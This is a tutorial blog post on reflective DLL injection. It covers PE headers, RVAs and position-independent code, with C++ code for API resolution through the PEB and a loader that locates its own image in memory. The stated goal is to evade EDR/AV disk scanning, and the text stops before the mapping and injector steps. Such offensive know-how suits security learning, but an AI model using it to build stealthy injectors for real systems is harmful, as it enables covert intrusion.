Reflective DLL

After spending some time implementing a Reflective DLL and its beloved Loader/Injector, I thought it would make a great first topic for what might become a long-ish series of blog posts about security, but mostly about struggles and C(++).

The first reason is that I struggled a bit to find resources that take the topic as a whole and explain every single step, along with the reasoning behind it. I might be really bad at googling, but I also found some motivation in the fact that you only really understand a topic when you try to explain it (and rant about it, with lots of memes: let’s be honest, we only really understand something when we know the right meme to put next to it).

So what’s going to be addressed here:

  • Technical reasoning behind Reflective DLL Injection
  • Intro to PE Structure
  • Intro to PE loading in memory
  • Pills of PIC (Position Independent Code)
  • StepByStep ReflectiveLoader function impl.
  • StepByStep Reflective DLL Injector impl.

I truly hope you will enjoy it.

Chee(e)rs

Reflective DLL injection

How does this work, and why is this technique still so widely used nowadays? Well, if we want to make it short (and we do), the reason is that we do not want to drop stuff on disk, where it is really easy for the EDR/AV to scan and analyse our nice artifacts. Moreover, we sometimes want to move to another process and bring cool capabilities with us (not only PIC shellcode). Hence Reflective DLL injection. That comes with some challenges of course, because a DLL is a PE (Portable Executable) and, as much as we wish it were possible, we can’t just copy-pasta it into memory and run the entry point. Which easily leads me to rant a bit about what a PE is and how it actually works; we will get back to this part, eventually.

PE (Portable Executable)

A portable executable kinda has a self-explanatory name: it can be moved from one system to another and still be executed to carry out some tasks. I will skip the part where I paste the list of all the extensions belonging to the PE category and just tell you that a DLL (Dynamic-Link Library) is on that list. But what makes a PE a PE? We can say that a PE is made of two macro groups of information:

  • Headers
  • Sections

The headers are basically the ID card of the PE. A few examples of the data they contain: the architecture the PE was built for, the version of the PE format, signatures, etc.

On the other hand, the sections contain the core of the PE: the actual compiled code, variables, functions, etc.

What makes the PE really portable is that all the information needed at runtime is contained within the PE itself.

Headers have a static position (not sure static is the right word here) that does not need to be adjusted when the PE is loaded in memory: they sit at the beginning of the PE, and their order and the distance between them are based on constant offsets (the same for any PE; there is one relative address used within the headers, the e_lfanew field that locates the NT headers, but it still points into the raw data). Furthermore, the compiled code does not actually need the headers to run, but the Windows loader needs them to know where to place the code so that it can run. We will see why this is important to us.

On the other hand, the content inside the sections relies completely on RVAs (Relative Virtual Addresses) generated by the compiler.

https://media3.giphy.com/media/jUwpNzg9IcyrK/giphy.gif?cid=7941fdc6sjfs9fwmtb1p9gfp8t9o31bq2bfrz1u8hrxi2no6&ep=v1_gifs_search&rid=giphy.gif&ct=g

When a process is launched, the operating system (OS) assigns it a set of virtual addresses, providing the memory it needs to carry out its operations. This set of addresses is referred to as the process’s virtual address space, and it is not assigned in advance. Since the PE does not know in advance at which address it is going to end up in memory, the compiler has to generate Relative Virtual Addresses (counted relative to the ImageBase of the PE in memory) to refer to data within the PE. To really understand the concept I suggest reading some blogs here and there, but what matters to us is this: since the PE is only going to be executed once it is loaded in the process’s virtual address space, all the information contained in the sections relies on RVAs.

Let’s also look at this from another angle: when we read the PE bytes from a file, or just download the file from the internet, we are dealing with raw data. Raw data is basically the way the PE looks on disk, and the PE headers tell us how those raw bytes need to be loaded in memory and where they should be placed to guarantee proper execution. We can rely on the headers even while still dealing with raw data, because they have the same shape in memory as on disk.

Most importantly, allocating memory within the virtual address space of a process and writing the raw bytes there does not mean we are loading the PE. The PE core wants to be in a specific shape within the virtual memory, and placing the sections at the correct virtual addresses with the correct memory protections (plus many other tasks) is what loading actually means.

I really feel like I have to stress this part though

https://media2.giphy.com/media/5LU6ZcEGBbhVS/giphy.gif?cid=7941fdc61behcrwuwmzvnibn6x424srwli1od9uhnvkcd2xh&ep=v1_gifs_search&rid=giphy.gif&ct=g

because most of the time the word “loading” comes across as if reading the bytes of a PE into a byte array were enough for the PE to be “loaded in memory”. It is not: the bytes there still look like raw data, and if you want to map them so that the PE can be executed, you have to look at the headers, understand what the PE needs to run smoothly, and eventually create its cozy environment in memory.
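To make the raw vs. loaded difference a bit more concrete, here is a minimal sketch of how an RVA can be translated back into an offset inside the raw file. The `SectionLayout` struct and the `rvaToFileOffset` name are my own simplifications for illustration (a real section header has more fields), so take it as a sketch under those assumptions and not as the code of the loader.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical, simplified view of one section header: only the fields
// needed to translate between the on-disk and the in-memory layout.
struct SectionLayout {
    std::uint32_t virtualAddress;   // RVA of the section once loaded
    std::uint32_t virtualSize;      // size of the section in memory
    std::uint32_t pointerToRawData; // offset of the section in the file
    std::uint32_t sizeOfRawData;    // size of the section in the file
};

// Translate an RVA into an offset in the raw file. Returns -1 when the RVA
// is outside every section or has no backing bytes on disk.
std::int64_t rvaToFileOffset(const std::vector<SectionLayout>& sections,
                             std::uint32_t rva) {
    for (const SectionLayout& s : sections) {
        if (rva < s.virtualAddress) continue;
        std::uint32_t delta = rva - s.virtualAddress;
        if (delta >= s.virtualSize) continue;    // not inside this section
        if (delta >= s.sizeOfRawData) return -1; // exists in memory only
        return static_cast<std::int64_t>(s.pointerToRawData) + delta;
    }
    return -1;
}
```

With a section that lives at file offset 0x400 but is mapped at RVA 0x1000, the RVA 0x1010 translates to file offset 0x410: same byte, two different coordinates.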

A great tool for exploring the PE structure is:

GitHub - hasherezade/pe-bear: Portable Executable reversing tool with a friendly GUI

Let’s pick an example and go through the Headers and Sections:

As I mentioned before, there are two macro groups of information: Headers and Sections.

We see on the left the structure of the PE, which starts with headers:

  • DOS Header
  • NT Header
  • File Header
  • Optional Header

Also on the left we can see the very beginning of the PE file (by clicking on the DOS header). Each line shows 16 bytes in hex, and the numbering starts from 0. That 0 is an RVA, relative again to the location the PE will get once loaded in memory (its Virtual Address). The content of all those headers is not really a topic for this blog post (which is already becoming too long), but you will probably find answers to all your questions here: https://learn.microsoft.com/en-us/windows/win32/debug/pe-format

Before moving forward: as I said, all those addresses are RVAs, which means:
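If you prefer code to screenshots, the very first checks on those headers can be sketched like this: read the DOS signature, follow e_lfanew, and read the NT signature. The helper names (`readAt`, `findNtHeaders`, `makeFakePe`) are made up for this example, the buffer is a fake image built by hand, and the sketch assumes a little-endian host; the offsets and signature values are the ones from the PE format documentation.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Read a value from a byte buffer (assumes a little-endian host).
template <typename T>
T readAt(const std::vector<std::uint8_t>& buf, std::size_t offset) {
    T value{};
    std::memcpy(&value, buf.data() + offset, sizeof(T));
    return value;
}

// Returns the offset of the NT headers, or -1 if the buffer does not
// start like a PE file.
std::int64_t findNtHeaders(const std::vector<std::uint8_t>& buf) {
    const std::size_t kLfanewOffset = 0x3C;  // position of e_lfanew in the DOS header
    if (buf.size() < kLfanewOffset + 4) return -1;
    if (readAt<std::uint16_t>(buf, 0) != 0x5A4D) return -1;           // "MZ"
    std::uint32_t lfanew = readAt<std::uint32_t>(buf, kLfanewOffset);
    if (static_cast<std::size_t>(lfanew) + 4 > buf.size()) return -1;
    if (readAt<std::uint32_t>(buf, lfanew) != 0x00004550) return -1;  // "PE\0\0"
    return lfanew;
}

// Build a tiny fake image: DOS magic, e_lfanew and NT signature only.
// lfanew must be at least 0x40 so it does not overlap the DOS header.
std::vector<std::uint8_t> makeFakePe(std::uint32_t lfanew) {
    assert(lfanew >= 0x40);
    std::vector<std::uint8_t> buf(lfanew + 4, 0);
    buf[0] = 'M';
    buf[1] = 'Z';
    std::memcpy(buf.data() + 0x3C, &lfanew, sizeof(lfanew));
    buf[lfanew] = 'P';
    buf[lfanew + 1] = 'E';
    return buf;
}
```

Calling `findNtHeaders(makeFakePe(0x80))` gives back 0x80, and it works the same whether the bytes come from disk or from memory, because the headers keep the same shape in both.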

  • We read the PE from file → nice byte[] is now holding the PE raw bytes
  • We VirtualAlloc a new place for our PE to be executed → Its new address is returned by VirtualAlloc and for instance is 0x00000249FCF30000

Hence all those addresses we see in PE-bear are going to become:

PE-bear RVA    In-memory address
0x0            0x00000249FCF30000 + 0x0
0x10           0x00000249FCF30000 + 0x10
and so on
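The table above is just one addition, which can be written down as a tiny helper. The function names are hypothetical; the base address is the example value returned by VirtualAlloc above.

```cpp
#include <cassert>
#include <cstdint>

// VA = base address of the image in memory + RVA.
constexpr std::uint64_t rvaToVa(std::uint64_t imageBase, std::uint32_t rva) {
    return imageBase + rva;
}

// The inverse: how far an address is from the base of the image.
constexpr std::uint64_t vaToRva(std::uint64_t imageBase, std::uint64_t va) {
    return va - imageBase;
}

static_assert(rvaToVa(0x00000249FCF30000ULL, 0x10) == 0x00000249FCF30010ULL,
              "RVA 0x10 lands 0x10 bytes after the base");
```

Nothing fancy, but it is the operation we will keep repeating for the rest of the post.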

Just below the headers we see the sections; those are the actual sections of compiled code:

Each section has a different purpose in the PE, e.g. holding global and static variables, function implementations, etc. That won’t be covered here either, but again this is actually a great resource to dive deeper into the PE structure.

A couple of extra things worth mentioning though:

  • We can confirm there is a difference between the way the PE looks on disk and the way it looks when loaded in memory

  • The Optional Header is not really optional: it holds quite a lot of information that matters for PE execution, among which we find the entry point (AddressOfEntryPoint), the SizeOfImage and the pointers to the Import/Export data structures
  • A PE might use functions defined in other libraries (DLLs), even if the PE itself is a DLL. All the DLLs needed for the PE to work correctly are listed in the Import directory.
  • If the PE is actually a DLL, the Export directory contains the functions the DLL exports, i.e. makes available to the processes that load it

The list above is a very short description of the PE structure and of how it behaves when it has to be executed; still, it should be enough to step into the real hot topic of this blog. One last summary though 😎

So again, why all the above?

The reason I have been ranting about RVAs and the Windows loader is that if we want to execute PEs in memory we have to act like the Windows loader. What makes this topic even more fun is that the Reflective DLL is going to be its own loader.

Bit of context: the DLL that we want to execute is going to end up very lonely in a remote process’s memory space. Moreover, the DLL won’t be loaded automatically, so the environment won’t be that cosy after all (just raw data → not good enough if we want to run the PE).

Bit of problems: of course we could build an independent loader and make it work on the remote process, but that would entail lots of cross-process operations, and if we started all of this to be more OPSEC-safe and stealthy that’s really the wrong path (and very painful to write, and it also makes no sense).

Bit of solutions: as I mentioned before, DLLs are kinda famous for exporting functions: a DLL can implement functions that are made available to the process that loads it. Very bello, but how does this help? Any function exported by the DLL is implemented at a specific RVA (remember PE-bear?), so in theory we can know where this function is in the PE even before it is loaded in memory. That function can be invoked to perform the loading operations 💡

True, the DLL still needs to be loaded in memory before it can be executed (global and static variables, imported functions…), but what if we manage to build a function that is position independent and also carries out all the loading tasks?

https://media0.giphy.com/media/AJwnLEsQyT9oA/giphy.gif?cid=7941fdc6iz2peinbkx349wfjgr42vr0qb76hx0bozbx1i1dx&ep=v1_gifs_search&rid=giphy.gif&ct=g

That is our solution: writing, within the DLL that we want to load, an exported function that is position independent and able to carry out the loading operations.

Let’s put all these nice concepts in a bullet list per favore:

  1. We inject the Reflective DLL into a remote process
  2. We find the raw offset of the ReflectiveFunction (its position within the raw bytes)
  3. We create a remote thread that executes that function in the remote process
  4. The DLL loads itself into memory and executes the entry point 😎

Still a bit confusing, I know:

By this time the concept of Reflective DLL injection should be more or less clear. But since I feel like I haven’t explained the concept of position-independent code well enough, let’s spend a few words on it. So why is the PE position-dependent, and why does it need the loader to be executed? As we saw before, the PE relies on many RVAs and embedded addresses, and those need to be resolved or adjusted based on the position the PE gets assigned in memory. However, it is possible to write code that compiles into a nice sequence of bytes able to run regardless of its position in memory, because for instance no external functions are used, strings are only built on the stack, etc.

Example of position-dependent code: you write a C++ function that uses the Win32 MessageBoxA API to pop an “I do care about where I am before running”. Calling MessageBoxA, which is imported from user32.dll, will break the code if it runs before the DLL is properly loaded: the MessageBoxA entry in the import table has not been resolved yet, so it holds a wrong address → boom.

Example of position-independent code: you write a C++ function that still uses the MessageBoxA API, but instead of linking against the library and invoking the function, it first parses the Export Directory of user32.dll in memory and retrieves the address of MessageBoxA without relying on the Windows loader. Eventually it will pop “I do not care where I am just let me run”

Finally some code!

Finally this blog post gets hands-on. We are going to develop two different modules here:

  • Reflective DLL: a DLL that exports a position-independent function that carries out all the loading operations before invoking the DLL entry point
  • Reflective DLL Injector: the DLL loads itself, but first it needs to be injected into some process, and the ReflectiveFunction must be invoked. This code takes care of that.

Little disclaimer: this code does not implement any technique to bypass current security protections. It is just a blog with learning/teaching purposes.

Reflective DLL

Ok so very first thing, the ReflectiveFunction will have to be exported:

#define EXTERN_DLL_EXPORT extern "C" __declspec(dllexport)
EXTERN_DLL_EXPORT bool ReflectiveFunction() {
//reflective function implementation, all the code we will be going through next
//ends up here
//     |
//     |
//     |
//     V
}

I will skip the part where I declare (most of) the variables: the code will be available on my GitHub, and here we are going to focus only on the logic of the loader. Still, there are some variables that demand some attention. It is important to keep in mind that everything within the “ReflectiveFunction” must be position independent. That means all our variables must be stack variables: they do not end up in a data section of the compiled image (where they would need to be relocated), and they are always addressed relative to the stack pointer.

//stack strings for PIC
WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
WCHAR ntdll[] = { L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0' };
WCHAR user32[] = { L'U', L's', L'e', L'r', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
CHAR virtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', '\0' };
CHAR virtualProtect[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', '\0' };
CHAR rtladdFunctionTable[] = { 'R', 't', 'l', 'A', 'd', 'd', 'F', 'u', 'n', 'c', 't', 'i', 'o', 'n', 'T', 'a', 'b', 'l', 'e', '\0' };
CHAR ntFlushInstructionCache[] = { 'N', 't', 'F', 'l', 'u', 's', 'h', 'I', 'n', 's', 't', 'r', 'u', 'c', 't', 'i', 'o', 'n', 'C', 'a', 'c', 'h', 'e', '\0' };
CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };

Declaring our strings as above makes the compiler write those single chars onto the stack at runtime. The difference lies in the initialization style: explicitly listing individual characters vs. using a string literal. The former results in an array built on the stack, while with the latter the characters live in a data section of the executable (and are referenced or copied from there).

Anyway, during the infamous loading process we will have to work with memory and memory protections, and also load other libraries. This sounds like the Win32 API, which as I mentioned above we can’t call through the usual imports in the context of PIC, but we can still implement our own version of GetModuleHandle and GetProcAddress to get our hands on the Win32 API function addresses.

In short, with GetModuleHandle we get a handle to a module (DLL), and with GetProcAddress we retrieve the address of a function within that module. How do we implement those functions?
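Here is a small portable sketch of the character-by-character style, together with a hand-written length routine so that no library function is involved. The function names are made up for the example. One caveat I would keep in mind: an optimizing compiler is free to lower such an initializer to a copy from read-only data, so it is worth checking the generated assembly rather than trusting the source.

```cpp
#include <cassert>
#include <cstddef>

// Length of a NUL-terminated string, written by hand so the sketch does not
// depend on any library routine.
std::size_t stackStrLen(const char* s) {
    assert(s != nullptr);
    std::size_t n = 0;
    while (s[n] != '\0') ++n;
    return n;
}

// Builds the API name character by character in a local array and measures it.
std::size_t virtualAllocNameLength() {
    char name[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', '\0' };
    return stackStrLen(name);
}
```

`virtualAllocNameLength()` returns 12, the number of characters in “VirtualAlloc” without the terminator.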

HMODULE GMHR(IN WCHAR szModuleName[]) {
    //custom structures for the PEB (definitions are in the full code)
    //the PEB is reached via the GS segment register (64bit only)
    //https://learn.microsoft.com/en-us/cpp/intrinsics/readgsbyte-readgsdword-readgsqword-readgsword?view=msvc-170
    //https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
    PPEBC                   pPeb = (PEBC*)(__readgsqword(0x60));
    PPEBC_LDR_DATA          pLdr = (PPEBC_LDR_DATA)(pPeb->Ldr);
    PLDR_DATA_TABLE_ENTRYC  pDte = (PLDR_DATA_TABLE_ENTRYC)(pLdr->InMemoryOrderModuleList.Flink);

    //custom implementation of tolower(), it lowercases the string in place
    ToLowerCaseWIDE(szModuleName);
    while (pDte) {
        //an entry without a name means we walked past the last module, byeee
        if (pDte->FullDllName.Length == 0) {
            break;
        }
        ToLowerCaseWIDE(pDte->FullDllName.Buffer);
        //if this is the DLL we want
        if (ComprareStringWIDE(pDte->FullDllName.Buffer, szModuleName)) {
            //with the custom structures used here this field yields the module base address
            return (HMODULE)(pDte->InInitializationOrderLinks.Flink);
        }
        //the first field of the entry is the Flink to the next entry
        pDte = *(PLDR_DATA_TABLE_ENTRYC*)(pDte);
    }
    return NULL;
}

If the implementation above works just fine, we will have a handle to the module we were looking for. As you can see I am using “custom” implementations of strcmp etc. That’s again because the code must be position independent 😊, so the only thing we can rely on is code that we write ourselves and that deals only with stack variables.

Now that we have the handle to the module we can use it to retrieve the function address. But what exactly is a handle to a module? It is a pointer to the beginning of the module in memory, hence we can use it as the starting point to parse the PE headers and find the RVA of the function we want:
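The string helpers used by GMHR are not shown in this post, so here is a minimal sketch of what such a helper could look like. The names `lowerAscii` and `equalsIgnoreCaseWide` are hypothetical, and unlike the ToLowerCaseWIDE approach above this version compares without modifying either string; it is an alternative under those assumptions, not the code from the repository.

```cpp
#include <cassert>

// Lowercase a single ASCII wide character; anything else is returned unchanged.
constexpr wchar_t lowerAscii(wchar_t c) {
    return (c >= L'A' && c <= L'Z') ? static_cast<wchar_t>(c - L'A' + L'a') : c;
}

// Case-insensitive comparison of two NUL-terminated wide strings.
// No library call is involved, only loops over the two buffers.
bool equalsIgnoreCaseWide(const wchar_t* a, const wchar_t* b) {
    assert(a != nullptr && b != nullptr);
    while (*a != L'\0' && *b != L'\0') {
        if (lowerAscii(*a) != lowerAscii(*b)) return false;
        ++a;
        ++b;
    }
    return *a == *b; // equal only if both strings end at the same position
}
```

For example `equalsIgnoreCaseWide(L"KERNEL32.DLL", L"Kernel32.dll")` is true, which is exactly the kind of match GMHR needs when walking the module list.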

FARPROC GPAR(IN HMODULE hModule, IN CHAR lpApiName[]) {

    //access to the first headers of the module
    PBYTE pBase = (PBYTE)hModule;
    PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);
    //access to optional header and get access to the export directory
    IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader;
    PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    //byte range covered by the export directory, used below to spot forwarders
    //(the cast to PBYTE comes first, so that the size is added in bytes)
    PBYTE pExportStart = (PBYTE)pImgExportDir;
    PBYTE pExportEnd = pExportStart + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
    //access to the array of functions 
    PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);
    PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
    PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);

    //stack variables for forwarding
    WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
    CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };
    fnLoadLibraryA LLA = NULL;
    PBYTE functionAddress = NULL;
    CHAR dll[260] = { 0 };
    CHAR function[260] = { 0 };

    // looping through all the exported names (only NumberOfNames entries have a name)
    for (DWORD i = 0; i < pImgExportDir->NumberOfNames; i++) {
        // getting the name of the function
        CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);
        // searching for the function specified
        if (ComprareStringASCII(lpApiName, pFunctionName)) {
            functionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
            if (functionAddress >= pExportStart && functionAddress < pExportEnd) {
                //an address inside the export directory is not code: it is a
                //forwarder string pointing to a function in another DLL
                ParseForwarder((CHAR*)functionAddress, dll, function);
                if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
                    return NULL;
                if (function[0] == '#') {
                    //sometimes modules refer to functions via ordinal
                    //instead of the name
                    return GPARO(LLA(dll), custom_stoi(function));
                }
                else {
                    return GPAR(LLA(dll), function);
                }
            }
            else {
                return (FARPROC)functionAddress;
            }
        }
    }
    return NULL;
}
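The forwarding branch above relies on a ParseForwarder helper that is not shown in this post. A forwarder is a string of the form "MODULE.Function" (or "MODULE.#ordinal"), so the helper has to split it in two and turn the module part into a file name. Below is a hypothetical sketch called `splitForwarder`; it splits at the last dot, which is my assumption, and it uses the C library for brevity, so unlike the real helper it is not position independent.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

// Split "MODULE.Function" (or "MODULE.#ordinal") into "MODULE.dll" and the
// function part. Returns false when the input is malformed or does not fit
// into the output buffers.
bool splitForwarder(const char* forwarder,
                    char* dll, std::size_t dllCap,
                    char* function, std::size_t funcCap) {
    assert(forwarder != nullptr && dll != nullptr && function != nullptr);
    const char* dot = std::strrchr(forwarder, '.');
    if (dot == nullptr || dot == forwarder || dot[1] == '\0') return false;

    std::size_t moduleLen = static_cast<std::size_t>(dot - forwarder);
    std::size_t funcLen = std::strlen(dot + 1);
    if (moduleLen + 5 > dllCap || funcLen + 1 > funcCap) return false;

    std::memcpy(dll, forwarder, moduleLen);
    std::memcpy(dll + moduleLen, ".dll", 5);      // 4 characters + terminator
    std::memcpy(function, dot + 1, funcLen + 1);  // includes the terminator
    return true;
}
```

Given "NTDLL.RtlAllocateHeap" it produces "NTDLL.dll" and "RtlAllocateHeap"; given "SHLWAPI.#12" the function part starts with '#', which is the case the code above hands over to the ordinal lookup.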

Beautiful, if everything went well we now have our hands on the function address we want. It is important to mention that modules sometimes refer to functions in an export directory by ordinal (an integer) rather than by name: every exported function has an ordinal, while the name is optional and sometimes not available. We want to be ready for that:

FARPROC GPARO(IN HMODULE hModule, IN int ordinal) {
    PBYTE pBase = (PBYTE)hModule;
    PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);

    IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader;
    PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    //byte range covered by the export directory, used below to spot forwarders
    PBYTE pExportStart = (PBYTE)pImgExportDir;
    PBYTE pExportEnd = pExportStart + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

    //getting the base = first ordinal value in the export table (DWORD 4 bytes)
    int base = (int)pImgExportDir->Base;
    int NumberOfFunctions = (int)pImgExportDir->NumberOfFunctions;

    //variables for forwarding
    WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
    CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };
    fnLoadLibraryA LLA = NULL;
    PBYTE functionAddress = NULL;
    CHAR dll[260] = { 0 };
    CHAR function[260] = { 0 };

    //check if we are dealing with a valid ordinal for that given module
    if (ordinal < base || ordinal >= base + NumberOfFunctions) {
        return NULL;
    }

    PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);

    //the address array is indexed by (ordinal - base), not by the raw ordinal
    functionAddress = (PBYTE)(pBase + FunctionAddressArray[ordinal - base]);
    if (functionAddress >= pExportStart && functionAddress < pExportEnd) {
        //still we need to check if the function is forwarded
        ParseForwarder((CHAR*)functionAddress, dll, function);
        if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
            return NULL;
        if (function[0] == '#') {
            return GPARO(LLA(dll), custom_stoi(function));
        }
        else {
            return GPAR(LLA(dll), function);
        }
    }
    return (FARPROC)functionAddress;
}
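Since the relationship between the three export arrays is easy to get wrong, here is a small model of it that runs on plain vectors instead of a real module. `ExportTable`, `rvaByName` and `rvaByOrdinal` are names invented for this sketch; the indexing rules are the ones from the PE format: a name at position i maps to `nameOrdinals[i]`, which is an index into `functions`, while a public ordinal maps to index `ordinal - base`.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical, already decoded model of an export directory.
struct ExportTable {
    std::uint32_t base;                       // first ordinal value
    std::vector<std::uint32_t> functions;     // AddressOfFunctions (RVAs)
    std::vector<const char*> names;           // AddressOfNames
    std::vector<std::uint16_t> nameOrdinals;  // AddressOfNameOrdinals
};

// Lookup by public ordinal: the array index is (ordinal - base).
std::uint32_t rvaByOrdinal(const ExportTable& t, std::uint32_t ordinal) {
    if (ordinal < t.base || ordinal - t.base >= t.functions.size()) return 0;
    return t.functions[ordinal - t.base];
}

// Lookup by name: names and nameOrdinals are parallel arrays, and the value
// found in nameOrdinals is already an index into functions (no base involved).
std::uint32_t rvaByName(const ExportTable& t, const char* name) {
    assert(t.names.size() == t.nameOrdinals.size());
    for (std::size_t i = 0; i < t.names.size(); ++i) {
        if (std::strcmp(t.names[i], name) == 0) {
            std::uint16_t index = t.nameOrdinals[i];
            return index < t.functions.size() ? t.functions[index] : 0;
        }
    }
    return 0;
}
```

With `base = 5` and three functions of which only two have a name, ordinal 6 still resolves (to the second entry) even though no name points at it, and that is why the loop over names must stop at the number of names and not at the number of functions.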

Cool, by this point we should have capabilities to handle:

  • Win32 APIs
  • Stack variables
  • Custom implementation of other library functions (please refer to the full code for this)

That’s pretty much all we need to implement our reflective code.

(From now on the code we will be dealing with is placed inside the “ReflectiveFunction”).

First we gather the pointers to the functions we will need:

//all the variables passed to GPAR or GMHR are stack strings declared as char[] as shown
if ((VA = (fnVirtualAlloc)GPAR(GMHR(kernel32), virtualAlloc)) == NULL)
        return FALSE;
if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
        return FALSE;
if ((VP = (fnVirtualProtect)GPAR(GMHR(kernel32), virtualProtect)) == NULL)
        return FALSE;
if ((RAFT = (fnRtlAddFunctionTable)GPAR(GMHR(kernel32), rtladdFunctionTable)) == NULL)
        return FALSE;
if ((FIC = (fnNtFlushInstructionCache)GPAR(GMHR(ntdll), ntFlushInstructionCache)) == NULL)
        return FALSE;

Now, in order to load itself in memory, the DLL has to look for its own first bytes (because, as the good loader that we are, we need to read the headers). To do so, it walks backwards from its own position until some conditions are met. The usual condition is a match on the DOS and NT signature bytes (sequences of bytes in the PE headers that identify a PE), which might work but can also generate false positives. My solution for this blog post, and most likely for future code, is to write a header in front of the DLL in the memory allocated in the remote process (kinda like an egghunter, if you are familiar with the concept), and to match that header before matching the DOS and NT signatures. The ReflectiveFunction looks backwards for the header bytes, and only when those match does it try to match the DOS and NT signatures.

while (TRUE)
    {
        pDllHeader = (PDLL_HEADER)dllBaseAddress;   
        //remember windows little-endian 
        if (pDllHeader->header == 0x44434241) {
            //header matched, we check if next bytes are DOS signature
            pImgDosHdr = (PIMAGE_DOS_HEADER)(dllBaseAddress + (5*sizeof(CHAR)));
            if (pImgDosHdr->e_magic == IMAGE_DOS_SIGNATURE)
            {                
              //DOS matched, we check if next bytes are NT signature
               pImgNtHdrs = (PIMAGE_NT_HEADERS)(dllBaseAddress + pImgDosHdr->e_lfanew + (5 * sizeof(CHAR)));
               if (pImgNtHdrs->Signature == IMAGE_NT_SIGNATURE) {
                    break;
                }
            }
        }
        //walking backwards removing one bytes at time from the
        //reflective function address
        dllBaseAddress--;
    }
    if (!dllBaseAddress)
        return FALSE;
    //fixing the baseAddress including the 5 bytes of header
    //so that it points to the beginning of the RAW DLL
    dllBaseAddress = dllBaseAddress + (5 * sizeof(CHAR));
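The same backward search can be tried safely on a plain byte buffer. The sketch below uses a hypothetical `findImageStart` function and a 5-byte marker like the one in the loop above (4 magic bytes plus one extra byte), and it only checks the marker and the “MZ” signature. One difference is deliberate: the sketch stops at the beginning of the buffer, whereas the loop above only ever exits through its break, so it relies on the marker really being there.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// 4 magic bytes + 1 extra byte, matching the 5 bytes skipped in the loop above.
constexpr std::size_t kMarkerSize = 5;

// Walk backwards from `start` until the marker is found directly in front of
// an "MZ" signature. Returns the index of the first byte of the raw image,
// or -1 if the beginning of the buffer is reached without a match.
std::int64_t findImageStart(const std::vector<std::uint8_t>& mem, std::size_t start) {
    assert(start < mem.size());
    const std::uint8_t magic[4] = { 'A', 'B', 'C', 'D' };  // 0x44434241 read as little-endian
    for (std::size_t i = start + 1; i-- > 0; ) {
        if (i + kMarkerSize + 2 > mem.size()) continue;     // not enough bytes left to compare
        if (std::memcmp(&mem[i], magic, sizeof(magic)) != 0) continue;
        if (mem[i + kMarkerSize] == 'M' && mem[i + kMarkerSize + 1] == 'Z')
            return static_cast<std::int64_t>(i + kMarkerSize);
    }
    return -1;
}
```

If the marker sits at index 10 of the buffer, the function returns 15: the position right after the 5 marker bytes, which is where the raw DLL begins.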

In the memory of the remote process it will look somewhat like this:

Now that the DLL has found itself in memory we can start with the actual process of loading:

  • Mapping sections in the Virtual Memory
  • Fixing the Import Address Table (IAT)
  • Applying the base relocations
  • Assigning the correct memory protection to every section
  • Flushing the CPU instruction cache
  • Running the DllMain entry point 💣

As I mentioned before, the bytes that we wrote in the remote process are raw bytes. For the DLL to be executed in memory, its bytes need to be mapped at specific virtual addresses:

